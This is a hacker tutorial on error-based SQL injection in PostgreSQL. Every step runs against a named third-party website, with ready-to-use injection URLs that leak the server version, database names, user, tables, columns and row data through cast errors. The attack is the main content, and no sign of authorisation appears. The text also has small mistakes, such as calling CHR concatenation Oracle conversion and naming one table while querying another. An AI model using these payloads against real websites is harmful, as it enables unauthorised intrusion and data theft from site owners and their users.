PostgreSQL Errorbased Injection

[denjacker]

Short Introduction:

Postgre:

Traditional relational database management systems (DBMSs) support a data model consisting of a collection of named relations, containing attributes of a specific type. In current commercial systems, possible types include floating point numbers, integers, character strings,

money, and dates.

Lets start to play with Postgre:

1st Step find the vulnerability:

http://www.creatop.com.cn/index.cfm?MenuID=80'

ERROR: syntax error at or near "''"

its mean this website wants to be injected

remember errors can varies you wont get the same error every time.

2nd Step Columns count:

http://www.creatop.com.cn/index.cfm?MenuID=80 order by 1--

get valid page

http://www.creatop.com.cn/index.cfm?MenuID=80 order by 2--

Error Executing Database Query.

ERROR: ORDER BY position 2 is not in select list

That Error shows that there is one column.

Lets try UNION SELECT query:

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=2 UNION SELECT 1--

Error Executing Database Query.

ERROR: UNION types character varying and integer cannot be matched

Seems like UNION SELECT query is not working !!!

Lets try Errorbased Postgre SQLi…

3rd Step:

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast(version() as int)--

ERROR: invalid input syntax for integer: "PostgreSQL 8.4.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit"

As we can see we got version of postgre DB server in the form of error.

Lets move on and find database name.

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 0) as int)--

Error Executing Database Query.

ERROR: invalid input syntax for integer: "scoutsqld"

Scoutsqld is 1st database name you can variey offset to get other databases names.

scoutsqld is first database we can get others by changing offset

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 1) as int)--

Error Executing Database Query.

ERROR: invalid input syntax for integer: "template0"

template0 is 2nd database so you can increase offset till you got error.

Lets find out the user:

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select user from pg_database limit 1 offset 0) as int)--

Error Executing Database Query.

ERROR: invalid input syntax for integer: "postgres"

postgres is the user

Lets find the tables :>

4th step:

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select table_name from information_schema.tables  limit 1 offset 0) as int)--

Error Executing Database Query.

ERROR: invalid input syntax for integer: "pg_type"

pg_type is first table we can get others by changing offset

5th step:

Now we have to find the columns from our specific table !!!

e.g

our table is action

for that we have to use oracle char conversion.

Pg_type= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101)

so our query is :

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select column_name from information_schema.columns where table_name= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101)  limit 1 offset 0) as int)--

Error Executing Database Query.

ERROR: invalid input syntax for integer: " typname "

And further you can find the columns using offset..

Last step:

Now we have to extract data from our column .

http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select typname from pg_type limit 1 offset 0) as int)--

Error Executing Database Query.

ERROR: invalid input syntax for integer: "bool"

Sorry for any mistake and for my grammar mistakes

Thanks all

Xploiter